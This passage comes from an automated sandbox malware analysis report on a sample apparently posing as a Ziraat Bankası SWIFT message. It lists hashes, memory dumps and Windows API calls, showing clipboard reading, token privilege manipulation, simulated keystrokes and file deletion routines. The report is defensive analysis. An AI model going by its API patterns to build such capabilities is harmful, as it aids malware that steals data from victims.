                                                                                                                                                        • Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                                                                                                                                        • Instruction Fuzzy Hash: 6401123150410EAECF45EFA4C8918FEBBB4AB11344F508129A55596196EA309A49DB60
                                                                                                                                                        APIs
                                                                                                                                                        • __lock_file.LIBCMT ref: 000A2AED
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2597487223-0
                                                                                                                                                        • Opcode ID: 2ba781a5b1d51c051c587b80507ae7956e89657b5c373f198857f16a93ed91e6
                                                                                                                                                        • Instruction ID: d6a7f8d4d82b242f26bbcc264b342bd77b9ebcf14c0e541e90ded2ddf8d0aa2f
                                                                                                                                                        • Opcode Fuzzy Hash: 2ba781a5b1d51c051c587b80507ae7956e89657b5c373f198857f16a93ed91e6
                                                                                                                                                        • Instruction Fuzzy Hash: 88F06231500215EBDF21AFE88C067DF36A5BF52320F1A8525B8149A192D7798A52DB52
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,000839FE,?,00000001), ref: 00084286
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: bf346150f5a58f2140ea71e4858d9c24f7fbfac6021c7b0668badc7af7a8f7fc
                                                                                                                                                        • Instruction ID: 8b3507c59122a7b62dfbd002b52df8db5c971ac9d5f07ffd7171eb803ca51651
                                                                                                                                                        • Opcode Fuzzy Hash: bf346150f5a58f2140ea71e4858d9c24f7fbfac6021c7b0668badc7af7a8f7fc
                                                                                                                                                        • Instruction Fuzzy Hash: DDF03971509702CFCB74AFA4E890816BBE4BF143253658A3EF1D682610C7729980DF50
                                                                                                                                                        APIs
                                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000840C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongNamePath
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 82841172-0
                                                                                                                                                        • Opcode ID: cf40b43872b3a1d70086f219001ce15d807e37e29b36301ae728fce07567acb3
                                                                                                                                                        • Instruction ID: 22ecd2beb470eac0e824047657304cffdf6895b1a2ce67de1408b2c998aed506
                                                                                                                                                        • Opcode Fuzzy Hash: cf40b43872b3a1d70086f219001ce15d807e37e29b36301ae728fce07567acb3
                                                                                                                                                        • Instruction Fuzzy Hash: CDE0C2366002245BC711A698DC46FFA77ADEF886A0F0A00B5F949E7245DEB4E9C18A90
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 00E4032B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                        • Instruction ID: 63a0a553f8a71605012890aedc5cf561d8157b03b47f06621bdfd7a6e2050c37
                                                                                                                                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                        • Instruction Fuzzy Hash: 65E08C31A29208EBCB60CEA9A804AED7BA8D704320F104764EA0AEB280D6308E40A614
                                                                                                                                                        APIs
                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,?,00000000,00000002), ref: 00083AB3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3098949447-0
                                                                                                                                                        • Opcode ID: e558db54257dfb3a4816ae95e53d4a55a5ea70157f9104509e374cc074ffbdf5
                                                                                                                                                        • Instruction ID: 5d1a8af16f610e5c3686045214403be78e1a0570fa7edd8b03d3364cea08d96a
                                                                                                                                                        • Opcode Fuzzy Hash: e558db54257dfb3a4816ae95e53d4a55a5ea70157f9104509e374cc074ffbdf5
                                                                                                                                                        • Instruction Fuzzy Hash: 2DD05B36300105EBC700EF84FC45D69B7A4E795751F00445AF645475B3CB6198D5DB91
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 00E402FB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                        • Instruction ID: b2ca918d5773da0d7ddfde8f22ad61577a5b2bc6c6f1fb616c5ce6cce5ec3341
                                                                                                                                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                        • Instruction Fuzzy Hash: A8D0A73090620CEBCB10CFB4AC089DE77A8D708320F104764FE15D7280D5319E409750
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00E41D11
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                        • Instruction ID: ce7adb861c154684d6004f3cd1adc288c3f361e5bb4028e41fb59844a6c65031
                                                                                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                        • Instruction Fuzzy Hash: CAE0BF7494010DEFDB00EFB4D5496DE7BB4EF04302F1005A1FD05E7680DB309E548A62
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00E41D11
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                        • Instruction ID: 651bef0f86dbf194d0f14518c4bd61fcc4c3de12cda1e75eb55d33ba9f36fbbf
                                                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                        • Instruction Fuzzy Hash: C0E0E67494010DDFDB00EFB4D54969E7FB4EF04302F1001A1FD01E2280D6309D508A62
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 000EB1CD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                                                        • Opcode ID: e4cb8a2133400c283ca6b68a3dff3b15ca1c430c11069c662991abe0af4fb997
                                                                                                                                                        • Instruction ID: aabec196d00cf000734ce081becf73c41e90bc8ca00cc6126f0afe8b546fd0f2
                                                                                                                                                        • Opcode Fuzzy Hash: e4cb8a2133400c283ca6b68a3dff3b15ca1c430c11069c662991abe0af4fb997
                                                                                                                                                        • Instruction Fuzzy Hash: AE12BF71600248AFEB259F66DC49BAF7BF4FF49320F104169F916EA2D1DBB09941CB11
                                                                                                                                                        APIs
                                                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0009EB4A
                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000F3AEA
                                                                                                                                                        • IsIconic.USER32(000000FF), ref: 000F3AF3
                                                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 000F3B00
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 000F3B0A
                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000F3B20
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 000F3B27
                                                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 000F3B33
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F3B44
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F3B4C
                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 000F3B54
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 000F3B57
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B6C
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 000F3B77
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B81
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 000F3B86
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B8F
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 000F3B94
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F3B9E
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 000F3BA3
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 000F3BA6
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 000F3BCD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                                                        • Opcode ID: ef4ad7a4a696d27e29f16d01efd1642c8ed84e32d748898c67b45a970d95dce9
                                                                                                                                                        • Instruction ID: 729ef3bdf2d76bfb6d0abddcffcb7bdd345ef03299c0bf1e40544e0032c75875
                                                                                                                                                        • Opcode Fuzzy Hash: ef4ad7a4a696d27e29f16d01efd1642c8ed84e32d748898c67b45a970d95dce9
                                                                                                                                                        • Instruction Fuzzy Hash: F7316F71A4021CBFEB316BA59C4AF7F7E6CEB44B60F104015FB45EA5D0DAF19D40AAA0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
                                                                                                                                                          • Part of subcall function 000BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
                                                                                                                                                          • Part of subcall function 000BB134: GetLastError.KERNEL32 ref: 000BB1BA
                                                                                                                                                        • _memset.LIBCMT ref: 000BAD08
                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000BAD5A
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000BAD6B
                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000BAD82
                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 000BAD9B
                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 000BADA5
                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000BADBF
                                                                                                                                                          • Part of subcall function 000BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 000BAB99
                                                                                                                                                          • Part of subcall function 000BAB84: CloseHandle.KERNEL32(?), ref: 000BABAB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                                                        • Opcode ID: 4576d6360e5c9af3a58795efc3f416452a18f14fa77ecf82781c2f83b2de891c
                                                                                                                                                        • Instruction ID: 99d14787ef448094161cdb16b2e15c3bc26fcac710f39286999549dd2544818c
                                                                                                                                                        • Opcode Fuzzy Hash: 4576d6360e5c9af3a58795efc3f416452a18f14fa77ecf82781c2f83b2de891c
                                                                                                                                                        • Instruction Fuzzy Hash: AF818EB1A00209AFEF11DFE4DC45AEEBBB8FF05304F044129F924A6561DB728E55DB61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000C5FA6,?), ref: 000C6ED8
                                                                                                                                                          • Part of subcall function 000C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000C5FA6,?), ref: 000C6EF1
                                                                                                                                                          • Part of subcall function 000C725E: __wsplitpath.LIBCMT ref: 000C727B
                                                                                                                                                          • Part of subcall function 000C725E: __wsplitpath.LIBCMT ref: 000C728E
                                                                                                                                                          • Part of subcall function 000C72CB: GetFileAttributesW.KERNEL32(?,000C6019), ref: 000C72CC
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C6149
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C6167
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000C618E
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 000C61A4
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000C6209
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C621C
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C622F
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 000C625D
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 000C626E
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 000C6289
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 000C6298
                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 000C62AD
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 000C62BE
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C62E1
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000C62FD
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000C630B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1917200108-1173974218
                                                                                                                                                        • Opcode ID: a49a765c52d9a123d5c36961ae5feb60eb0e5b392660f508fefaefb42a1f8f3f
                                                                                                                                                        • Instruction ID: cf765eeaf80e08ec05d025df2188fa2b58a52d4ffd6bdc75e607a878d6db4e04
                                                                                                                                                        • Opcode Fuzzy Hash: a49a765c52d9a123d5c36961ae5feb60eb0e5b392660f508fefaefb42a1f8f3f
                                                                                                                                                        • Instruction Fuzzy Hash: 92510E7290811C6ACB21EB91DC44EEF77FCAF05310F0901EAE585E2142DE769789CFA4
                                                                                                                                                        APIs
                                                                                                                                                        • OpenClipboard.USER32(0011DC00), ref: 000D6B36
                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 000D6B44
                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 000D6B4C
                                                                                                                                                        • CloseClipboard.USER32 ref: 000D6B58
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 000D6B74
                                                                                                                                                        • CloseClipboard.USER32 ref: 000D6B7E
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 000D6B93
                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 000D6BA0
                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 000D6BA8
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 000D6BB5
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 000D6BE9
                                                                                                                                                        • CloseClipboard.USER32 ref: 000D6CF6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3222323430-0
                                                                                                                                                        • Opcode ID: f9958058cfbc9608f3c6daf072df63d0e359c2e97e34d47d74e0d5962bfaea6e
                                                                                                                                                        • Instruction ID: 7264bfb048063a30417b7d8c1243912f9443676dcb0a09fdb9a4abcf1bbefcfa
                                                                                                                                                        • Opcode Fuzzy Hash: f9958058cfbc9608f3c6daf072df63d0e359c2e97e34d47d74e0d5962bfaea6e
                                                                                                                                                        • Instruction Fuzzy Hash: 66517071244301ABD310BBA0DD96FAE77A8AF94B11F00042AF586D62D2DFB1D9858B72
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 000CF62B
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000CF67F
                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000CF6A4
                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000CF6BB
                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000CF6E2
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CF72E
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CF767
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CF7BB
                                                                                                                                                          • Part of subcall function 000A172B: __woutput_l.LIBCMT ref: 000A1784
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CF809
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CF858
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CF8A7
                                                                                                                                                        • __swprintf.LIBCMT ref: 000CF8F6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                        • API String ID: 835046349-2428617273
                                                                                                                                                        • Opcode ID: c859feda1b14214bbe05e6252b271f6c0a38e3a18423a44404333aaa0105e7a1
                                                                                                                                                        • Instruction ID: 608f5d45f8ecd78455a4bb7892b671087b15c61e03b015d4c7d8ef7ace935659
                                                                                                                                                        • Opcode Fuzzy Hash: c859feda1b14214bbe05e6252b271f6c0a38e3a18423a44404333aaa0105e7a1
                                                                                                                                                        • Instruction Fuzzy Hash: F7A10CB2408344ABD710FBA4C885DEFB7ECBF98704F44092EF59582192EB34D949DB62
                                                                                                                                                        APIs
